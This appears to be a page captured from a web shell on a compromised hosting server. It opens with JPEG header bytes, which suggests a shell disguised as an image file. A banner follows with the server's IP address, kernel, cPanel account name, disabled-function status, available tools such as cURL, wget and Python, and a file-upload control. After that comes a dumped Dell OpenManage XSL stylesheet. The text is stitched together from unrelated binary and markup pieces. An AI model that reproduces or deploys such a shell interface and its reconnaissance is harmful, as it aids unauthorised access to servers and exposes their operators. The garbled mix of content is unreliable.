����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.22.223.160 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/dell/srvadmin/var/lib/openmanage/xslroot/hip/template/web/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format"> <xsl:template match="/DataArea"> <xsl:copy> <xsl:apply-templates select="@* | script | Header | PageTitle | PromptText | CustomButton"/> <TableData columnspacing='true' nouniqueids='true' sortable="true"> <Header> <Data align="center" name="Severity" width="80" link="true" href="./DataArea?plugin=com.dell.hip.webplugins.ESMLogWebPlugin&sortkey=severity&order=descending"><xsl:attribute name="value"><xsl:value-of select="$strSeverity"/></xsl:attribute><xsl:attribute name="display"><xsl:value-of select="$strSeverity1"/></xsl:attribute></Data> <Data name="DateTime" width="120" link="true" href="./DataArea?plugin=com.dell.hip.webplugins.ESMLogWebPlugin&sortkey=date&order=ascending"><xsl:attribute name="descendsorted">true</xsl:attribute><xsl:attribute name="value"><xsl:value-of select="$strDateAmpTime"/></xsl:attribute><xsl:attribute name="display"><xsl:value-of select="$strDateAmpTime1"/></xsl:attribute></Data> <Data name="Description" link="true" href="./DataArea?plugin=com.dell.hip.webplugins.ESMLogWebPlugin&sortkey=description&order=ascending"><xsl:attribute name="value"><xsl:value-of select="$strDescription"/></xsl:attribute><xsl:attribute name="display"><xsl:value-of select="$strDescription1"/></xsl:attribute></Data> </Header> <xsl:apply-templates select="TableData/Row"> <xsl:sort select="Data[2]/@display" data-type="number" order="descending"/> </xsl:apply-templates> </TableData> </xsl:copy> </xsl:template> <xsl:template match="/ | @* | node()"> <xsl:copy> <xsl:apply-templates select="@* | node()"/> </xsl:copy> </xsl:template> </xsl:stylesheet>